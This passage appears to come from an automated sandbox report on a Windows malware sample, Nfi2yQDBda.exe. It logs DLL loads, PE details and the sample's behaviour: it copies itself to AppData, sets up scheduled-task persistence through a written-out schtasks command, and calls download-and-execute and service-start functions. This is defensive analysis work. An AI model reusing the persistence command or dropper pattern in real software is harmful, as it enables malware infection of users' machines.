            Source: C:\Users\user\Desktop\Nfi2yQDBda.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\xjXWSRbLn" /XML "C:\Users\user\AppData\Local\Temp\tmpB4A4.tmp"Jump to behavior
            Source: C:\Users\user\Desktop\Nfi2yQDBda.exeProcess created: C:\Users\user\Desktop\Nfi2yQDBda.exe "C:\Users\user\Desktop\Nfi2yQDBda.exe"Jump to behavior
            Source: C:\Users\user\AppData\Roaming\xjXWSRbLn.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\xjXWSRbLn" /XML "C:\Users\user\AppData\Local\Temp\tmpC463.tmp"Jump to behavior
            Source: C:\Users\user\AppData\Roaming\xjXWSRbLn.exeProcess created: C:\Users\user\AppData\Roaming\xjXWSRbLn.exe "C:\Users\user\AppData\Roaming\xjXWSRbLn.exe"Jump to behavior
            Source: C:\Users\user\AppData\Roaming\xjXWSRbLn.exeProcess created: C:\Users\user\AppData\Roaming\xjXWSRbLn.exe "C:\Users\user\AppData\Roaming\xjXWSRbLn.exe"Jump to behavior
            Source: C:\Users\user\Desktop\Nfi2yQDBda.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\Desktop\Nfi2yQDBda.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\Nfi2yQDBda.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\Nfi2yQDBda.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\Nfi2yQDBda.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\Nfi2yQDBda.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\Nfi2yQDBda.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\Nfi2yQDBda.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\Nfi2yQDBda.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\Nfi2yQDBda.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\Nfi2yQDBda.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Nfi2yQDBda.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\Nfi2yQDBda.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\Nfi2yQDBda.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\Nfi2yQDBda.exeSection loaded: dwrite.dllJump to behavior
            Source: C:\Users\user\Desktop\Nfi2yQDBda.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\Nfi2yQDBda.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\Nfi2yQDBda.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\Nfi2yQDBda.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Nfi2yQDBda.exeSection loaded: windowscodecs.dllJump to behavior
            Source: C:\Users\user\Desktop\Nfi2yQDBda.exeSection loaded: textshaping.dllJump to behavior
            Source: C:\Users\user\Desktop\Nfi2yQDBda.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\Desktop\Nfi2yQDBda.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\Nfi2yQDBda.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\Nfi2yQDBda.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Users\user\Desktop\Nfi2yQDBda.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\Nfi2yQDBda.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\Nfi2yQDBda.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\Nfi2yQDBda.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\Nfi2yQDBda.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Users\user\Desktop\Nfi2yQDBda.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\Nfi2yQDBda.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Users\user\Desktop\Nfi2yQDBda.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Users\user\Desktop\Nfi2yQDBda.exeSection loaded: slc.dllJump to behavior
            Source: C:\Users\user\Desktop\Nfi2yQDBda.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Users\user\Desktop\Nfi2yQDBda.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Users\user\Desktop\Nfi2yQDBda.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\Nfi2yQDBda.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\Desktop\Nfi2yQDBda.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\Nfi2yQDBda.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\Nfi2yQDBda.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\Nfi2yQDBda.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\Nfi2yQDBda.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\Nfi2yQDBda.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\Nfi2yQDBda.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\Nfi2yQDBda.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Nfi2yQDBda.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Nfi2yQDBda.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\Nfi2yQDBda.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\Nfi2yQDBda.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\Nfi2yQDBda.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\Nfi2yQDBda.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\xjXWSRbLn.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\xjXWSRbLn.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\xjXWSRbLn.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\xjXWSRbLn.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\xjXWSRbLn.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\xjXWSRbLn.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\xjXWSRbLn.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\xjXWSRbLn.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\xjXWSRbLn.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\xjXWSRbLn.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\xjXWSRbLn.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\xjXWSRbLn.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\xjXWSRbLn.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\xjXWSRbLn.exeSection loaded: dwrite.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\xjXWSRbLn.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\xjXWSRbLn.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\xjXWSRbLn.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\xjXWSRbLn.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\xjXWSRbLn.exeSection loaded: windowscodecs.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\xjXWSRbLn.exeSection loaded: textshaping.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\xjXWSRbLn.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\xjXWSRbLn.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\xjXWSRbLn.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\xjXWSRbLn.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\xjXWSRbLn.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\xjXWSRbLn.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\xjXWSRbLn.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\xjXWSRbLn.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\xjXWSRbLn.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\xjXWSRbLn.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\xjXWSRbLn.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\xjXWSRbLn.exeSection loaded: slc.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\xjXWSRbLn.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\xjXWSRbLn.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\xjXWSRbLn.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\xjXWSRbLn.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\xjXWSRbLn.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\xjXWSRbLn.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\xjXWSRbLn.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\xjXWSRbLn.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\xjXWSRbLn.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\xjXWSRbLn.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\Nfi2yQDBda.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Users\user\Desktop\Nfi2yQDBda.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: Nfi2yQDBda.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: Nfi2yQDBda.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
            Source: Nfi2yQDBda.exeStatic file information: File size 1164800 > 1048576
            Source: Nfi2yQDBda.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x11bc00
            Source: Nfi2yQDBda.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Nfi2yQDBda.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: DLrIR.pdb source: Nfi2yQDBda.exe, xjXWSRbLn.exe.0.dr
            Source: Binary string: DLrIR.pdbSHA256| source: Nfi2yQDBda.exe, xjXWSRbLn.exe.0.dr
            Source: Nfi2yQDBda.exeStatic PE information: 0xE3611A06 [Sun Nov 19 16:21:26 2090 UTC]
            Source: C:\Users\user\AppData\Roaming\xjXWSRbLn.exeCode function: 13_2_0041A8DA LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,13_2_0041A8DA
            Source: C:\Users\user\AppData\Roaming\xjXWSRbLn.exeCode function: 13_2_004000D8 push es; iretd 13_2_004000D9
            Source: C:\Users\user\AppData\Roaming\xjXWSRbLn.exeCode function: 13_2_0040008C push es; iretd 13_2_0040008D
            Source: C:\Users\user\AppData\Roaming\xjXWSRbLn.exeCode function: 13_2_004542E6 push ecx; ret 13_2_004542F9
            Source: C:\Users\user\AppData\Roaming\xjXWSRbLn.exeCode function: 13_2_0045B4FD push esi; ret 13_2_0045B506
            Source: C:\Users\user\AppData\Roaming\xjXWSRbLn.exeCode function: 13_2_00432BD6 push ecx; ret 13_2_00432BE9
            Source: C:\Users\user\AppData\Roaming\xjXWSRbLn.exeCode function: 13_2_00454C08 push eax; ret 13_2_00454C26
            Source: Nfi2yQDBda.exeStatic PE information: section name: .text entropy: 7.4333879216457275
            Source: xjXWSRbLn.exe.0.drStatic PE information: section name: .text entropy: 7.4333879216457275
            Source: C:\Users\user\AppData\Roaming\xjXWSRbLn.exeCode function: 13_2_004063C6 ShellExecuteW,URLDownloadToFileW,13_2_004063C6
            Source: C:\Users\user\Desktop\Nfi2yQDBda.exeFile created: C:\Users\user\AppData\Roaming\xjXWSRbLn.exeJump to dropped file

            Boot Survival

            barindex
            Source: C:\Users\user\Desktop\Nfi2yQDBda.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\xjXWSRbLn" /XML "C:\Users\user\AppData\Local\Temp\tmpB4A4.tmp"
            Source: C:\Users\user\AppData\Roaming\xjXWSRbLn.exeCode function: 13_2_00418A00 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,13_2_00418A00

            Hooking and other Techniques for Hiding and Protection

            barindex
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Users\user\AppData\Roaming\xjXWSRbLn.exeCode function: 13_2_0041A8DA LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,13_2_0041A8DA
            Source: C:\Users\user\Desktop\Nfi2yQDBda.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nfi2yQDBda.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nfi2yQDBda.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nfi2yQDBda.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nfi2yQDBda.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nfi2yQDBda.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nfi2yQDBda.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nfi2yQDBda.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nfi2yQDBda.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nfi2yQDBda.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nfi2yQDBda.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nfi2yQDBda.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nfi2yQDBda.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nfi2yQDBda.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nfi2yQDBda.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nfi2yQDBda.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nfi2yQDBda.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nfi2yQDBda.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nfi2yQDBda.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nfi2yQDBda.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nfi2yQDBda.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nfi2yQDBda.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nfi2yQDBda.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nfi2yQDBda.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nfi2yQDBda.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nfi2yQDBda.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nfi2yQDBda.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nfi2yQDBda.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nfi2yQDBda.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nfi2yQDBda.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nfi2yQDBda.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nfi2yQDBda.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nfi2yQDBda.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nfi2yQDBda.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nfi2yQDBda.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nfi2yQDBda.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nfi2yQDBda.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nfi2yQDBda.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nfi2yQDBda.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nfi2yQDBda.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nfi2yQDBda.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nfi2yQDBda.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nfi2yQDBda.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nfi2yQDBda.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Nfi2yQDBda.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
